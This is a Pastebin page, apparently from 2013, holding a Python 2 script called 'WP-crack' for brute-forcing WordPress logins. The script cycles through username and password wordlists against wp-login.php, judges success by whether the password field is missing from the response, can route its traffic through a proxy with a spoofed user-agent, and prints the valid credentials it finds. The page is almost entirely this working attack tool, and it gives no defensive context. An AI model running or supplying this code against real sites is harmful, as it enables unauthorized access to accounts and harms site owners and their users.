API tools faq
paste
Advertisement
Guest User

[Python] Wordpress BruteForce | Nabilaholic404

a guest
Nov 4th, 2013
5,096
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 7.67 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/python
  2. # -*- coding: utf-8 -*-
  3. import sys
  4. import urllib2, urllib
  5. import cookielib
  6. import re
  7.  
  8. #
  9. #functions
  10. #
  11.  
  12. def loadLst(fileName, lstName):
  13.     f = open(fileName, 'r')
  14.     for line in f:
  15.         lstName.append(line.replace('\r\n',''))
  16.     f.close()
  17.  
  18. if len(sys.argv) <= 1:
  19.     print 'WP-crack v1.0 (c)2012 by Zonesec - a very fast logon WordPress Cracker'
  20.     print 'Website: http://www.zonesec.com'
  21.     print 'Mail   : zonesec@gmail.com'
  22.     print ''
  23.     print 'Syntax: python WP-crack [-u USER|-U FILE] [-p PASS|-P FILE] -h URL [OPT]'
  24.     print ''
  25.     print 'Options:'
  26.     print '-h URL'
  27.     print '-U file contain list user'
  28.     print '-P file contain list password'
  29.     print '-u username'
  30.     print '-p password'
  31.     print '-v verbose mode / show login+pass combination for each attempt'
  32.     print '-f continue after found login/password pair'
  33.     print '-g user-agent - default: "Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0"'
  34.     print '-x use proxy | ex: 127.0.0.1:1234'
  35.     print ''
  36.     print 'Examples: python WP-crack.py -h http://test.com/wp-login.php -u admin -P password.txt'
  37.     sys.exit()
  38.  
  39. print 'WP-crack 1.0 (c)2012 by Zonesec - a very fast logon WordPress Cracker'
  40. print 'Website: http://www.zonesec.com'
  41. print 'Mail   : zonesec@gmail.com'
  42.  
  43. #
  44. #define variables
  45. #
  46.  
  47. print ""
  48.  
  49. url = ''
  50. wordlist = ''
  51. username = ''
  52. password = ''
  53. passFile = ''
  54. userFile = ''
  55. signal = 'type="password"'
  56. count = 0
  57. countAcc = 0
  58. mode = 1
  59. verbose = 0
  60. useProxy = 0
  61. continues = 0
  62. agent = 'Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0'
  63. result = ""
  64.  
  65.  
  66. #
  67. #check argvs
  68. #
  69. for arg in sys.argv:
  70.     if arg == '-h':
  71.         url = sys.argv[count + 1]
  72.     elif arg == '-u':
  73.         username = sys.argv[count + 1]
  74.     elif arg == '-U':
  75.         userFile = sys.argv[count + 1]
  76.     elif arg == '-p':
  77.         password = sys.argv[count + 1]
  78.     elif arg == '-P':
  79.         passFile = sys.argv[count + 1]
  80.     elif arg == '-v':
  81.         verbose = 1
  82.     elif arg == '-s':
  83.         signal = sys.argv[count + 1]
  84.     elif arg == '-g':
  85.         agent = sys.argv[count + 1]
  86.     elif arg == '-x':
  87.         lstTmp = sys.argv[count+1].split(':')
  88.         proxyHandler = urllib2.ProxyHandler({lstTmp[0] : lstTmp[1]+':'+lstTmp[2]})
  89.         useProxy = 1
  90.     elif arg == '-f':
  91.         continues = 1
  92.     count += 1
  93.  
  94.  
  95. if (len(username)>0 and len(password)>0):
  96.     mode = 1 #single
  97. elif (len(username)>0 and len(passFile)>0):
  98.     mode = 2 #
  99. elif (len(userFile)>0 and len(password)>0):
  100.     mode = 3
  101. elif (len(userFile)>0 and len(passFile)>0):
  102.     mode = 4
  103.  
  104. #
  105. #init opener
  106. #
  107. cookieJar = cookielib.CookieJar()
  108. cookieHandler = urllib2.HTTPCookieProcessor(cookieJar)
  109. if useProxy == 0:
  110.     opener = urllib2.build_opener(cookieHandler)
  111. else:
  112.     opener = urllib2.build_opener(proxyHandler,cookieHandler)
  113. opener.addheaders = [('User-agent', agent)]
  114. cookieJar.clear()
  115. cookieJar.clear_session_cookies()
  116.  
  117. #
  118. #main
  119. #
  120. try:
  121.     response = opener.open(url)
  122.     content = response.read()
  123.     if mode == 1:
  124.         values = {'log' : username,
  125.                       'pwd' : password,
  126.                       'wp-submit' : 'Log In',
  127.                       'redirect_to' : '',
  128.                       'testcookie' : '1' }
  129.         data = urllib.urlencode(values)
  130.         print data
  131.         response = opener.open(url+'/', data)
  132.         strTmp = response.read()
  133.         if strTmp.find(signal) < 0:
  134.             countAcc += 1
  135.             result += "username: " + username + "   password: " + password + "\n"
  136.             print "Valid user--pass: " + username + " -- " + password
  137.             f3 = open('test.html','w')
  138.             f3.write(strTmp)
  139.             f3.close()  
  140.            
  141.    
  142.    
  143.     if mode == 2:
  144.         f = open(passFile,'r')
  145.         for line in f:            
  146.             password = line.strip('\n\r')
  147.             values = {'log' : username,
  148.                       'pwd' : password,
  149.                       'wp-submit' : 'Log In',
  150.                       'redirect_to' : '',
  151.                       'testcookie' : '1' }
  152.             if verbose == 1:
  153.                 print "Trying u--p     : " + username + " -- " + password            
  154.             data = urllib.urlencode(values)
  155.             try:
  156.                 response = opener.open(url+'/', data)
  157.             except urllib2.URLError, e:
  158.                 continue
  159.             strTmp = response.read()
  160.             if strTmp.find(signal) < 0:
  161.                 countAcc += 1
  162.                 result += "username: " + username + "   password: " + password + "\n"
  163.                 print "Valid user--pass: " + username + " -- " + password                
  164.                 break;
  165.          
  166.  
  167.  
  168.     if mode == 3:
  169.         f = open(userFile,'r')
  170.         for line in f:
  171.             username = line.strip('\n\r')
  172.             values = {'log' : username,
  173.                       'pwd' : password,
  174.                       'wp-submit' : 'Log In',
  175.                       'redirect_to' : '',
  176.                       'testcookie' : '1' }
  177.             if verbose == 1:
  178.                 print "Trying u--p     : " + username + " -- " + password
  179.             data = urllib.urlencode(values)
  180.             try:
  181.                 response = opener.open(url+'/', data)
  182.             except urllib2.URLError, e:
  183.                 continue
  184.             strTmp = response.read()
  185.             if strTmp.find(signal) < 0:
  186.                 countAcc += 1                
  187.                 result += "username: " + username + "   password: " + password + "\n"
  188.                 print "Valid user--pass: " + username + " -- " + password                
  189.                 if continues == 0:
  190.                     break
  191.                 cookieJar.clear()
  192.                 cookieJar.clear_session_cookies()
  193.                 response = opener.open(url)
  194.                 content = response.read()
  195.  
  196.                
  197.        
  198.     if mode == 4:
  199.         f = open(userFile,'r')
  200.         f2 = open(passFile,'r')
  201.         for line in f:
  202.             username = line.strip('\n\r')
  203.             f2.seek(0)
  204.             for line2 in f2:
  205.                 password = line2.strip('\n\r')
  206.                 values = {'log' : username,
  207.                       'pwd' : password,
  208.                       'wp-submit' : 'Log In',
  209.                       'redirect_to' : '',
  210.                       'testcookie' : '1' }
  211.                 if verbose == 1:
  212.                     print "Trying u--p     : " + username + " -- " + password
  213.                 data = urllib.urlencode(values)
  214.                 try:
  215.                     response = opener.open(url+'/', data)
  216.                 except urllib2.URLError, e:
  217.                     continue
  218.                 strTmp = response.read()
  219.                 if strTmp.find(signal) < 0:
  220.                     countAcc += 1                    
  221.                     result += "username: " + username + "   password: " + password + "\n"
  222.                     print "Valid user--pass: " + username + " -- " + password                    
  223.                     if continues == 0:
  224.                         break;
  225.                     cookieJar.clear()
  226.                     cookieJar.clear_session_cookies()
  227.                     response = opener.open(url)
  228.                     content = response.read()
  229.                    
  230.         f.close()
  231.         f2.close()    
  232.        
  233.     #Finish
  234.     print ''      
  235.     print '1 target successfuly completed, '+ str(countAcc) +' valid username+password found'
  236.     print 'TARGER: ' + url
  237.     print 'RESULT:'        
  238.     print result
  239.     sys.exit()
  240. except urllib2.URLError, e:
  241.     print "\n\t[!] Session Cancelled; Error occured. Check internet settings"
  242. except (KeyboardInterrupt):
  243.     print "\n\t[!] Session cancelled"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!